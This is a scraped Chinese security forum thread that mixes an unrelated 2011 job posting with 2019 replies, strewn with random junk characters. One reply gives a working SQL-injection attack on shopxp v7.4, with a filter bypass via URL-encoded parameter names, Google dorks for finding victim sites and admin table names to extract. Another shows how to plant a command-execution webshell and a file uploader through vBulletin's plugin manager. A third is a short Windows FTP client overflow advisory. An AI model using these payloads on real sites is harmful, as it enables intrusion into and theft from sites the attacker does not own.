Board logo

标题: [人才招聘] [招聘] 启明星辰招聘 [打印本页]

作者: 小妍    时间: 2011-1-18 15:34     标题: 启明星辰招聘

岗位:备机库主管
/ p2 _9 x' o- s( f1 w& _3 ^% M" T+ K: k- V$ l

& }# n2 Y+ t0 X' p: [0 X, T  o4 ^. X岗位职责:. V* C0 ]' C) e9 ]% C1 q2 y% Y* A

# |2 {' |+ R8 U% S3 m8 \7 C5 q1.负责公司产品备机库的管理。
. @4 x& i4 j- L& ~" \( i3 s  |) [
: ?' v" a. Z( |: V5 m2.产品安装调试。; g5 N+ v3 ^! ^2 P+ {
% B% x; g: M4 u0 S/ S9 `4 G- m! z
3.对备机使用情况做统计分析。
$ q$ \! t% k3 j
0 X0 y3 G9 e2 d2 h; ?: \' ~* S岗位要求:- S9 O( g9 L- w" H! v, x) D+ A

; {5 n7 z0 M3 _9 u" O/ _, ^0 w1.熟悉客户关系管理、网络安全相关知识;了解数据统计分析技术。
- k. |) j6 v6 u# i: A* l1 m: `: ~# q9 ?! t+ y
2.熟悉路由器、交换机等常用网络设备。$ M! m3 C" x$ f7 m6 F" ~: T8 e
% s6 i. \. ?( m9 Z' ^
3.熟悉防火墙、VPN等常见网络安全产品。6 j! Y/ [6 Q8 _1 i; q" c3 E3 J
7 R( J2 J& Q( w4 c" q8 H9 C& F% O
4.了解计算机硬件相关知识。
, C3 S& T9 f  H! L9 J( H6 H! Q% Y9 t& f3 r8 H3 f
5.一年以上硬件技术支持经验,有网络安全行业经验优先考虑。
( T$ R! E! n7 y; b8 T4 e
; |; {- [, Y, O7 l4 K6.有较强的责任心,有敬业精神,有良好的沟通能力、动手能力,有团队合作精神,学习能力强。3 L& G8 g) s  x- N- W9 [

- n; T8 l" H; i- J$ e发送简历
作者: loye13    时间: 2019-7-25 23:01

shopxp v7.4 SQL注入漏洞
shopxp网上购物系统 v7.4存在Sql注入漏洞。问题文件:xpCatalog_xpDesc.asp,xpCatalog_xpsmall_Desc.asp问题代码:<% # m# _6 F2 b/ I1 u1 p* u
dim shopxpbe_id, anclassname, shopxpse_id, nclassnamedim totalPut dim CurrentPage, TotalPages
" R6 v) x# S6 j: ^
if request("shopxpbe_id")<>"" thenshopxpbe_id=request("shopxpbe_id")elseshopxpbe_id=0end ifif request("shopxpbe_id")="" then shopxpbe_id=1end ifif not isempty(request("page")) thencurrentPage=cint(request("page"))elsecurrentPage=1end if
( V/ N( V: C6 M) B6 e1 C6 v
set rs=server.createobject("adodb.recordset")rs.open "select * from shopxp_btype where shopxpbe_id="&amp;shopxpbe_id,conn,1,1anclassname=rs("shopxpbe_name")rs.close%>并没有对shopxpbe_id进行整形判断。下面在说说他的防注入系统。好像是网上的枫叶防注入。看代码吧:Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_ZxFy_Cl = 2 '处理方式:1=提示信息,2=转向页面,3=先提示再转向Fy_Zx = "../" '出错时转向的页面On Error Resume NextFy_Url=Request.ServerVariables("QUERY_STRING")Fy_a=split(Fy_Url,"&amp;")redim Fy_Cs(ubound(Fy_a))On Error Resume Nextfor Fy_x=0 to ubound(Fy_a)Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)NextFor Fy_x=0 to ubound(Fy_Cs)If Fy_Cs(Fy_x)<>"" ThenIf Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 ThenSelect Case Fy_Cl省略部分代码
4 x! n* ]$ U. E& C& B
这个防注入系统在网上貌似很火,但是他防的是有问题的。关键是这句,Fy_Url=Request.ServerVariables("QUERY_STRING"),Request.ServerVariables得到的数据是原样的,并不会进行URL解码。这也就导致可以进行URL编码绕过这个防注入。以下是lake2对这段代码的分析:
8 O1 R( G7 @* [' C. k0 J
“它的思路就是先获得提交的数据,以“&amp;”为分界获得并处理name/value组,然后判断value里是否含有定义的关键字(这里为求简便,我只留下了“and”),有之,则为注射。
/ n) C, F6 C( y9 z
乍一看去,value被检查了,似乎没有问题。呵呵,是的,value不会有问题,可是,name呢?
0 _. z7 |  h" N2 J
它的name/value组值来自于Request.ServerVariables("QUERY_STRING"),呵呵,不好意思,这里出问题了。Request.ServerVariables("QUERY_STRING")是得到客户端提交的字符串,这里并不会自动转换url编码,哈哈,如果我们把name进行url编码再提交的话,呵呵,那就可以绕过检查了。比如参数是ph4nt0m=lake2 and lis0,此时程序能够检测到;如果提交%50h4nt0m=lake2 and lis0(对p进行url编码),程序就会去判断%50h4nt0m的值,而%50h4nt0m会被转换为ph4nt0m,所以%50h4nt0m值为空,于是就绕过了检测。
3 _: }# }/ [- i; ?) C* ]% n1 ^% }
等等,为什么既然name不解码可以绕过检查而value就不能绕过呢?因为value的值取自Request(Fy_Cs(Fy_x)),这个服务器就会解码的。

1 c# e" K1 a: @$ E
程序怎么改进呢?只要能够得到客户端提交的数据是解码后的就可以了,把得到name的语句改为For Each SubmitName In Request.QueryString就可以了。”
# [3 g, s; Z8 k' L1 m
下面说下利用:Google:inurl:xpCatalog_xpDesc.asp?action_key_order=biginurl:Catalog_Desc.asp?action_key_order=big (这个貌似是商业版的)构造如下地址:http://www.sitedir.com.cn/xpCatalog_xpDesc.asp?action_key_order=big&amp;shopxpbe_%69d=79 (对i进行URL编码),交给工具 手动添加表名:shopxp_admin 和shop_admin(商业版的)默认后台是 admin_shopxp 或者admin
. z! E& Z: ?5 l
+ n$ a( A: a+ E  N% a/ j3 d* g4 d
- G7 g5 Y+ Z+ s" B
3 ^) v+ a( O  s% [
+ y" M6 I7 `% U

9 U7 w4 U' X9 b; W4 L( B
/ E3 q# E# I6 @% K8 e0 U+ {$ N9 T* w: R1 q' ]

3 \% t6 q4 `; _6 ~; i9 C
' E) n: {3 l" \6 I  t- Z" _2 f4 c' m
0 \; c9 v* {: B1 a% \$ f: `
8 r7 B( _2 G7 @4 {$ z. e
1 t( i; \% u3 S4 r6 M8 y0 [8 d
, X4 Z' A- X& ~
0 g7 T$ M. f7 {. F, u
! L0 s3 y3 w% b* M$ h; e
, }% g5 \; t4 I3 x7 o

3 ^  i' _$ z7 p1 J: Y% }& S公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: xin0000    时间: 2019-8-19 23:55

vBulletin后台获取webshell方法总结
方法一:' u& d' D% n( C# [7 ^6 ?
首先在“插件和产品”(Plugins and Products)下边选择插件管理(Plugin Manager),然后右边选择添加新插件(Add New Plugin),在“Hook Location”(不知道杂翻译)处选择ajax_complete,Title处随便写,比如JK7OSE,然后关键的地方到了“Plugin PHP Code”(插件PHP代码),输入if(isset($_GET['jkrose'])){echo "<h1>jkrose</h1><pre>"; system($_GET['jkrose']);exit;}注意,是去掉PHP的<? ?>标记的,这样就算完成了,利用时只需ajax.php?jkrose=cmd命令,可以wget一个webshell,可以ls -la,cat filename等YY的事。
4 k' M6 q) R+ q9 ?) n; E5 K* A4 G+ C- e$ ?3 a; M( C
方法二:
8 y8 E1 _* ]2 p7 Z. S0 H前边相同,代码处写一个接收上传的代码:

' E# l2 J# T& `9 y5 j8 Z1 B; {5 N6 _
$target_path = "images/avatars"; //注意权限要为可写的
$ J0 {; a! h9 }4 H/ K5 c5 e& O
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
& E* V: [7 k3 E, L! D4 `
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 3 P- G+ h7 g% e: M0 ?  L
    echo "The file ". basename( $_FILES['uploadedfile']['name']). . H* I8 G( i5 U4 F9 w3 d" A
    " has been uploaded"; ; m; j0 N+ E% k9 Z9 w5 X: _
} else{ . R6 l6 F8 L" _, r# _
    echo "There was an error uploading the file, please try again!"; 6 v$ o: G: m9 _) w9 S" C6 T" y
}
4 U' p2 ~: R' q+ b
   然后访问ajax.php会提示“No input File Specified”之类的,如果没出现的话那肯定时哪有问题了,如果出现了就继续下边的,在网站随便某个地方,只要能写HTML代码就行,写个上传,比如说模板编辑那些地方,写个上传代码:

0 r' e* M+ T/ N  C7 [& p0 W" S, Q
<form enctype="multipart/form-data" action="ajax.php" method="POST"> " @4 \8 ^. ~1 X5 }5 q" d
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
6 [8 Z- K3 c2 X5 U6 B6 c* M% aChoose a file to upload: <input name="uploadedfile" type="file" /><br />
% a0 B) o, M3 M# o* I7 F1 I<input type="hidden" name="s" value="$session[sessionhash]" />
1 x( w& l( x& a; X* ?<input type="hidden" name="securitytoken" value="$bbuserinfo[securitytoken]" /> 8 G" P& z/ R( }) w+ b
<input type="submit" value="Upload File" /> $ {' i4 t! t- p' O2 p
</form>

8 I& f) {. @7 ~8 v
保存就完工了,最后如果时新添加的风格的话,要在网站左下角切换过来才能用
5 j+ @. Q& d0 h9 p

# B9 @; B& r  |+ n
+ _) p9 [* w3 a: u2 n0 s- }- K. \3 P( b0 q
# S& w/ U/ A3 U* ?7 @; W. i$ X
6 p8 |1 [/ @$ d% K0 M: s

& |/ @! F& a4 n2 [+ S9 Z
" ?+ \. X9 U& u
, Y% J* c( r3 p" N* [" Q8 Z3 p7 I9 G. e8 E& ?& V5 N! }

8 _8 m; S+ @! _. d% x1 Q, p) u! V/ e5 ?1 G$ J6 N) B- {
8 _" a$ D, O6 Z, D* Z" K% k1 g

5 l! I6 y# I  |7 F
2 n. C+ \( g$ x! I# T( |8 a2 w- N+ E) T. B
( O2 h4 d+ B% E
4 h+ Y/ S( V9 |
1 R  t/ R. l+ Y0 Y+ |

2 m4 w$ [/ d/ H4 \
2 w6 ~  _0 {) s# n6 V9 Y( o) W公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: hushui8878    时间: 2019-9-28 23:20

Microsoft Windows FTP客户端有多个远程溢出漏洞
受影响系统:Microsoft Windows XPMicrosoft Windows 2000SP4Microsoft Windows 2000 Server SP4
/ z* X( |+ f6 Q' `
描述:

) h7 N; ~' Y2 i. e# j, |
Microsoft Windows是微软发布的非常流行的操作系统。

: x' ~' i  t3 l, ^5 H; B
Windows系统自带的FTP客户端实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制客户端。

* S. G5 K0 L& e& L
Windows操作系统所捆绑的FTP客户端没有正确地验证mget、dir、user、password、ls等命令,如果用户使用FTP客户端连接到了FTP服务器上带有超长文件夹名或文件名的目录并发布了上述命令的话,就可以触发缓冲区溢出,导致拒绝服务或执行任意指令。但这个漏洞较难利用,因为需要社会工程学且必须以有漏洞命令参数的形式注入shellcode。
( y& ?# g5 Y% A* m( ]1 c- N
厂商补丁:
/ H  ~1 Y; {2 e- s
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
6 o/ f7 k8 ?2 R
http://www.microsoft.com/technet/security/
7 l3 }8 D- I8 L" }/ H% w, i0 h
4 M* u3 D. Y+ V% e) G' A

8 {% d9 }( v  y8 I0 W( q: J( X7 ^1 l! d8 W$ N# K
: W& c$ B9 }& T' q" N! j
5 L, @% [# C- L% s# e' r

4 `- r$ i! D# g; s+ D2 Y/ y% F, q9 P
: C* `% g0 ~9 C$ r5 E' b
: S( a& x1 b( A$ e, j2 V7 g; C2 A8 \( c$ U

' G* w% ^& v3 \' _0 P! ~
# J9 `3 u% H0 p/ r3 x& u, A2 P3 s" e% l1 b3 o) n

: S% u6 V: ?  c) w2 ]
, O8 F! Y! q1 Y% N' p
" j+ q4 k/ O* D1 g/ ^% s+ E. q
5 E5 f; H/ Y/ Y5 _9 G" e+ K# k. Z
# I5 ~/ O, a% a+ D9 a* x0 d4 S' r' y& J* D2 f8 @
公告:https://www.sitedirsec.com公布最新漏洞,请关注




欢迎光临 非安全中国网-官方论坛{sitedirsec} (http://sitedirsec.com/) Powered by Discuz! 7.2